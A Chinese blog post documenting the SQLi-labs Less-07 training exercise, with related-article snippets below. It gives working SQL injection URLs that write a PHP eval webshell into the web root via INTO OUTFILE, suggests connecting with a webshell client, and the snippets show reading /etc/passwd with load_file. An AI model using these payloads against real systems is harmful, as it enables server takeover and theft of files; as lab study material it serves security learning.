Sqli-labs Less07 输出到文件 - GET

最新推荐文章于 2022-07-24 14:29:57 发布
最新推荐文章于 2022-07-24 14:29:57 发布
阅读量408 收藏 1
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/81519270
版权

本文记录 SQL 注入的学习过程,资料为 SQLi-labs

SQLi 博客目录

Less - 07: GET - Dump into outfile - String

  1. 测试漏洞

    本关我们利用文件导入的方式进行注入

    URL 中输入 ‘)) or 1=1–+

    源代码中

    $sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";

    这里对 id 参数进行了 ‘)) 的处理。所以我们其实可以尝试 ‘)) or 1=1–+进行注入

    http://10.10.10.137/sqli-labs/Less-7/?id=1')) or 1=1--+


    http://10.10.10.137/sqli-labs/Less-7/?id=-1')) UNION SELECT 1,2,3 into outfile "/var/www/sqli-labs/Less-7/uuu.txt"--+

    上图中显示 sql 出错了,但是没有关系,我们可以在文件中看到 uuu.txt 已经生成了。

    我们可以直接将一句话木马导入进去

    http://10.10.10.137/sqli-labs/Less-7/?id=1'))UNION SELECT 1,2,'<?php @eval($_post[?mima?])?>' into outfile "/var/www/sqli-labs/Less-7/yijuhua.php"--

    可以使用菜刀连接木马

网络安全打工人
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Mysql注入中的outfile、dumpfile、load_file函数详解
01-19
在利用sql注入漏洞后期,最常用的就是通过mysql的file系列函数来进行读取敏感文件或者写入webshell,其中比较常用的函数有以下三个 into dumpfile() into outfile() load_file() 我们本次的测试数据如下 读写文件函数调用的限制 因为涉及到在服务器上写入文件,所以上述函数能否成功执行受到参数 secure_file_priv 的影响。官方文档中的描述如下 翻译一下就是 其中当参数 secure_file_priv 为空时,对导入导出无限制 当值为一个指定的目录时,只能向指定的目录导入导出 当值被设置为NULL时,禁止导
sqli-labs】Less7
weixin_33882443的博客
08-16 85
Less-7: 输出文件 sql导出文件语句 select * from table_test into outfile 'test.txt' 既然名字是输出文件,那肯定是和文件有关系。 首先,确保sql有写文件权限,即my.ini中有类似下面的语句。这里我作弊了,直接设置了sqli-labs-master的文件夹可以写文件。 secure_file_priv="D:/phpStudy/WW...
Sqli-labs Less7
orchid_sea的博客
07-24 1221
这里还有一个需要了解的点就是在mysql5.5版本之前secure_file_priv这个值是默认为空的,那么我们拿到的webshell如果对应的mysql数据库版本在5.5以下的话操作起来就比较方便,在mysql5.5版本之后secure_file_priv这个值是默认为NULL的,即不能够往数据库内写入文件。/tmp的意思是只能在/tmp目录下写入文件,这种情况下就需要考虑写入文件文件夹后能否在网页上访问连接到这个目录,在MYSQL的bin目录下进入cmd,查看MySQL的权限设置。...
sqli-labs (less-7)
kukudeshuo的博客
03-07 440
sqli-labs (less-7) 补充知识 load_file()函数读文件操作 例:select load_file('/etc/passwd') into outfile写文件操作 例:select '<?php phpinfo();?>' into outfile 'c:\wwwroot\1.php' 一句话木马 php的一句话木马: <?php @eval($_POST['icepeak']);?> asp的一句话是: <%eval request ("icep
Sqli-labs之Less-7
m0_46315342的博客
06-04 3082
                                          &nbs...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs配置数据库sqli-labs的数据库文件
03-09
Unable to connect to the database: security sqli-labs通过docker安装时,缺少数据库文件,可以通过这个sql文件直接安装
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
windows环境下安装sqli-labs
11-04
windows server 2012 环境下,安装sqli-labs的详细教程,适合新手小白,大神可以参考一下,有不足的地方请联系我。
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs--Less7
m0_60829468的博客
10-22 2232
系列文章目录 提示:这里可以添加系列文章的所有文章的目录,目录需要自己手动添加 例如:第一章 Python 机器学习入门之pandas的使用 提示:写完文章后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 系列文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着人工智能的不断发展,机器学习这门技术也越来越重要,很多人都开启了学习机器学习,本文就介绍了机器学习的基
sqlilabs—less7
一个普普通通的博客
03-24 2514
sqlilabs—less7
sqli-labs less -7
qq_45106794的博客
10-18 394
##sqli-labs less -7 http://localhost/sqli-labs-master/Less-7/?id=1 首先老办法判断是数值型的、还是字符型的 用and 1=1 和and 1=2 判断并不是数值型的 接下来用’ 以及 " 来判断 结果判断’ 回显错误 " 回显正常 说明是’ 字符型 但是用 ’ --+ 发现 说明还缺少一些东西 猜测用) 发现’))–+ 回显...
SQLI-Lab】-Less7
xinyue9966的博客
01-26 638
Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 通过报错判断类型和闭合 http://192.168.135.149/sqli/Less-7/?id=1' 判断为字符型,进一步查看回显 http
sqli-labs】 less7 GET - Dump into outfile - String (导出文件GET字符型注入)
ajxi63204的博客
01-19 414
使用此漏洞需要知道WEB程序的根路径并且MYSQL的secure-file-priv配置应为可写入该路径 添加单引号,发现错误被屏蔽 对应的SQL语句应为 select ... from ... where xx=(('1')) ... 字段还是3个 在数据库中执行测试,看是否能写入成功 SELECT * FROM users WHERE id=(...
sqli-lab教程——Less-7 GET - Dump into outfile - String (导出文件GET字符型注入)
luosaierdadi的博客
07-08 299
几次尝试,不难猜出注释符被过滤了,但是看看题目:less 7 GET - Dump into outfile - String (导出文件GET字符型注入)所以大概要使用文件导出。我投机取巧了,找了个简单题less-2直接注入拿到路径,方便导出。这里插个小扩展:winserver的iis默认路径c:\Inetpub\wwwrootlinux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr/share/nginx,/var/www/htm等ap
sqli-labs靶场Less-7
songling515010475的专栏
08-21 322
备注:虽然从首页进来就知道是dump into outfile但我还是假设按不知道的流程来一步步尝试,这样才会印象深刻,不然我觉得失去练习的意义了。 1、访问首页,/Less-7/index.php?id=1,这里的传参点是id 探测五步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 这里我还是按原因来的先探测五步走一遍,结果发现只有两种结果如下: 结果1: 结果2: 分析:这里我尝试不管是怎么样,通过...
SQLI-LABS-MASTER Less7 学习笔记
qq_27385503的博客
09-03 909
花了很长的时间才把Less7注入成功,并且连上其数据库。 环境:虚拟机VMware14+win7 64位+PHP study 这是Less 7 进入之后,输入id=1看到的结果。对于页面上显示的Yours SQL sentences are :SELECT * FROM users WHERE id=((‘1”))…..这是在源代码中加入了如下代码: 1. echo "&lt;...
Sqli-labs--Less7-10
小人物的博客
05-22 594
Less 7 Dump into outfile 第七关,通过注入导出文件,一句话木马。 需要知道的是根目录,以及mysql中my.ini文件中的secure_file_priv,没有的话可以在my.ini中直接加入,有了这个才能导出。 payload : http://127.0.0.1/sqli-labs/Less-7/index.php?id=-1'))Union sel...
sqli-labs less
最新发布
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值